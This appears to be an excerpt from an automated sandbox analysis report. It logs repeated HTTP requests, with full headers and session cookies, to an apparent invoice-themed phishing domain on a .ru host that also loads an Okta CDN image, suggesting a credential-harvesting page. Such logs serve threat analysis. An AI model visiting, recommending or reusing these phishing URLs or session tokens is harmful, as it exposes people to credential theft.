                Source: global trafficHTTP traffic detected: GET /efFrs1BHOKLi9ZMJGcklORTeAzVJNu5QdrBIkKhzcI5a90150 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klqxZQ7i49HVQDFkT2K9BPiyyzFXOnXx5i81oj42ckX3Ue56169 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ijSWB6XDt2x23vPWFuGmlisfdPo0Mn2Fqr4oBXq1n5NrfcM46mk9Zmyz230 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /yziOkKzJZKPnEqui42UNe02Trs1vH0s5elZ6Hr1mNBwuab180 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /op328rcsbOGBUSeGtzq25hcrvpTsZOfghsLFQq1ELO8tMocL4jZef199 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /uveXL7lccWo3VQL1AQNrNkqrY0gg6oIq92t2l012130 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /oppCC2yff12YyfUIa0hvdyqmnO1npn8eKKiH67140 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /ijeLyVUGNsKP7COU4jZjq9x7klsBCi5YH6sFBErcQVzoldipaq9Ref210 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klqxZQ7i49HVQDFkT2K9BPiyyzFXOnXx5i81oj42ckX3Ue56169 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /efFrs1BHOKLi9ZMJGcklORTeAzVJNu5QdrBIkKhzcI5a90150 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /yziOkKzJZKPnEqui42UNe02Trs1vH0s5elZ6Hr1mNBwuab180 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qr347VQocLux8bJ296y3sGsK0qKDjDkaqzGUesuvjEQdpuQn0RocxGsyZziUJj4ef240 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /uvtEwEyzMAhf6EpnunDLNl1fXrnAsov2mnPpoo2EjamMRPOTqFQN1a7tgWlOFf9HWC0Fgh260 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
